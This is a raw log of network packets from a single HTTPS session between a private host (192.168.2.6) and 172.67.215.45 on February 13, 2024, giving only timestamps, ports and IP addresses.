Feb 13, 2024 21:13:54.922210932 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.922271013 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.922278881 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.922347069 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.922451973 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.922466993 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.922504902 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.922518015 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.922552109 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.922552109 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.923841953 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.923858881 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.923918009 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.923918009 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.923926115 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.924084902 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.924730062 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.924746990 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.924791098 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.924808025 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.924855947 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.925589085 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.925611973 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.925649881 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.925657034 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.925689936 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.925689936 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.925825119 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.925841093 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.925904989 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.925913095 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.926137924 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.926765919 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.926781893 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.926842928 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.926842928 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.926855087 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.926887035 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.927881002 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.927902937 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.927979946 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.927990913 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.928030014 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.928719044 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.928738117 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.928791046 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.928800106 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.928888083 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.929018974 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.929033995 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.929116964 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.929131985 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.929352999 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.929691076 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.929758072 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.929795980 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.929795980 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.929804087 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.929872036 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.931243896 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.931323051 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.931361914 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.931361914 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.931370020 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.931432009 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.931934118 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.931967974 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.932017088 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.932017088 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.932024956 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.932060957 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.932533026 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.933176994 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.933218002 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.933259964 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.933279037 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.933298111 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.933370113 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.933389902 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.933445930 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.933445930 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.933460951 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.933497906 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.933497906 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.934057951 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.934075117 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.934134007 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.934140921 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.934160948 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.934189081 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.934875011 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.934891939 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.934972048 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.934972048 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.934981108 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.935051918 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.936175108 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.936192989 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.936276913 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.936276913 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.936290026 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.936418056 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.936479092 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.936494112 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.936528921 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.936537027 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.936573982 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.936705112 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.937408924 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.937424898 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.937479973 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.937498093 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.937562943 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.938117027 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.938133955 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.938230038 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.938239098 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.938427925 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.939337015 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.939352989 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.939415932 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.939416885 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.939429998 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.939460039 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.939475060 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.939485073 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.939522982 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.939522982 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.940646887 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.940661907 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.940709114 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.940721035 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.940763950 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.940763950 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.942167044 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.942182064 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.942243099 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.942256927 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.942328930 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.942544937 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.942559958 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.942614079 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.942630053 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.942673922 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.942728043 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.942740917 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.942780018 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.942794085 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.942902088 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.961572886 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.961587906 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.961661100 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.961675882 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.961874008 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.962061882 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.962075949 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.962131023 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.962137938 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.962393999 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.962476969 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.962491035 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.962536097 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.962549925 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.962680101 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.962954044 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.962966919 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.963033915 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.963033915 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.963041067 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.963119030 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.964035034 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.964049101 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.964139938 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.964147091 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.964276075 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.965070963 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.965101957 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.965162992 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.965162992 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.965169907 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.965207100 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.965774059 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.965787888 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.965843916 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.965850115 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.965873003 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.965894938 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.966265917 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.966279984 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.966324091 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.966337919 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.966485977 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.967077971 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.967092037 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.967489004 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.967494011 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.967561007 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.967622995 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.967637062 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.967777967 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.967784882 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.967869997 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.968929052 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.968943119 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.969008923 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.969008923 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.969010115 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.969022036 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.969044924 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.969090939 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.969090939 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.969096899 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.969146967 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.970252991 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.970266104 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.970303059 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.970316887 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.970388889 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.970721960 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.970735073 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.970784903 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.970784903 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.970792055 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.970825911 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.971262932 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.971276999 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.971309900 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.971317053 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.971343994 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.971343994 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.971441984 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.971455097 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.971718073 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.971728086 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.972511053 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.972752094 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.972764969 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.972804070 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.972817898 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.973870993 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.973872900 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.973881006 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.973903894 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.973937035 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.973943949 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.973958969 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.973979950 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.974647045 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.974661112 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.974709988 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.974716902 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.974740028 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.974750042 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.974760056 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.974767923 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.974785089 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.975203991 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.975517035 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.975531101 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.975580931 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.975580931 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.975589037 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.975687981 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.976382017 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.976397038 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.976480961 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.976489067 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.976625919 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.977513075 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.977524996 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.977585077 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.977591038 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.977624893 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.977830887 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.977845907 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.977900028 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.977900028 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.977906942 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.977967024 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.979079962 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.979093075 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.979149103 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.979149103 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.979159117 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.979192972 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.979372978 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.979387045 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.979422092 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.979428053 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.979443073 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.979541063 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.980334997 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.980351925 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.980401993 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.980407953 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.980420113 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.980441093 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.981060028 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.981075048 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.981125116 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.981131077 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.981226921 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.981442928 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.981457949 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.981518984 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.981518984 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.981528044 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.981628895 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.984318972 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.984335899 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.984410048 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.984416962 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.984611034 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.984739065 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.984752893 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.984797955 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.984812021 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.984863997 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.985510111 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.985524893 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.985586882 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.985593081 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.985630035 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.985846043 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.985861063 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.985965014 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.985971928 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.986073017 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.986618996 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.986634970 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.986715078 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.986715078 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.986721992 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.986771107 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.987422943 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.987437963 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.987505913 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.987509966 CET	443	49701	172.67.215.45	192.168.2.6
Feb 13, 2024 21:13:54.987584114 CET	49701	443	192.168.2.6	172.67.215.45
Feb 13, 2024 21:13:54.988311052 CET	443	49701	172.67.215.45	192.168.2.6
